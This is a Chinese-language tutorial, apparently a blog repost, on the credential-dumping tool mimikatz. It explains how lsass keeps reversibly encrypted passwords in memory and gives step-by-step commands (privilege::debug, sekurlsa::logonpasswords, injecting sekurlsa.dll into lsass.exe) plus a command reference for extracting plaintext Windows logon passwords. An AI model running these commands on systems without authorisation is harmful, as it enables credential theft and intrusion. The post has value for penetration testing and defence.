法国大面包 mimikatz使用方法

安装很简单
在这里插入图片描述

查看下版本
法国大面包 mimikatz使用方法_第1张图片

mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

这个软件被称为密码抓取神器,mimikatz2.0以后的版本抓取密码很简单,只需要两步:
第一条(提升权限)
privilege::debug

第二条(抓取密码)
sekurlsa::logonpasswords
法国大面包 mimikatz使用方法_第2张图片

简单命令

cls-----------------------------清屏
exit----------------------------退出
version------------查看mimikatz的版本
system::user-----查看当前登录的系统用户
system::computer-------查看计算机名称
process::list------------------列出进程
process::suspend 进程名称 -----暂停进程
process::stop 进程名称---------结束进程
process::modules --列出系统的核心模块及所在位置
service::list---------------列出系统的服务
service::remove-----------移除系统的服务
service::start stop 服务名称–启动或停止服务
privilege::list---------------列出权限列表
privilege::enable--------激活一个或多个权限
privilege::debug-----------------提升权限
nogpo::cmd------------打开系统的cmd.exe
nogpo::regedit -----------打开系统的注册表
nogpo::taskmgr-------------打开任务管理器
ts::sessions-----------------显示当前的会话
ts::processes------显示进程和对应的pid情况等
sekurlsa::wdigest-----获取本地用户信息及密码
sekurlsa::tspkg------获取tspkg用户信息及密码
sekurlsa::logonPasswords–获登陆用户信息及密码

1.常规的操作使用命令
mimikatz # cls -->清屏,类似dos命令cls.
mimikatz # exit -->退出mimikatz.
mimikatz #version -->查看当前的mimikatz的版本.
随便输入"xxx::",会提示"modules:‘xxx’ intr0uvable",大概意思就是你输入的命令不存在,然后会列出所有可用的命令
查看列表中命令的具体参数同样可以输入"命令::"来查看
命令inject的具体参数有pid,process,service等……

2.系统方面的操作使用命令:system
mimikatz #system::user -->查看当前登录的系统用户
mimikazt #system::computer -->返回当前的计算机名称

3.在服务器终端的操作命令: ts
mimikatz #ts::sessions -->显示当前的会话
mimikatz #ts::processes windows-d.vm.nirvana.local -->显示服务器的进程和对应的pid情况等。

4.系统服务相关的操作使用命令:service

5.系统进程相关操作的使用命令:process

6.系统线程相关操作使用命令:thread

7.系统句柄相关操作使用命令:handle

8.加密相关操作使用命令:crypto

9.注入操作使用命令:inject

mimikatz获取用户名及密码的方法
方法一:
1.运行主程序:mimikatz.exe
2. 输入:privilege::debug 提升权限
3. 输入:inject::process lsass.exe sekurlsa.dll 将sekurlsa.dll 注入到lsass.exe 中(运行到这一步会出现拒绝访问的提示)
4. 输入:@getLogonPasswords 即可获取hash和当前用户的明文密码!

原理就是登陆的时候输入的密码,经过 lsass.exe 里的wdigest和tspkg两个模块调用后,它们对之进行加密处理,而没有进行擦除
而且该加密通过特征可以定位,并且按照微软的算法可逆。 只要登陆过,就可以抓出来,它进行枚举的。
简单地说,在 Windows 中,当用户登录时,lsass.exe 使用一个可逆的算法,加密过的明文密码,并且把密文保存在内存中,没有清理,然后可以抓出来,还原。
也就是说,开机以后,只要是登陆过的用户,在没重启前(因为重启内存就清零了,这里不包括使用其他方法清理内存),都可以抓出来,注销也是无用的,
因为内存中的密码并没有清除,所以还是可以抓出来的。

方法二(直接调用sekurlsa模块):(经本人测试有效)
1.运行主程序:mimikatz.exe
2. 输入:privilege::debug 提升权限
3.输入:sekurlsa::logonPasswords full

你可能感兴趣的:(法国大面包 mimikatz使用方法)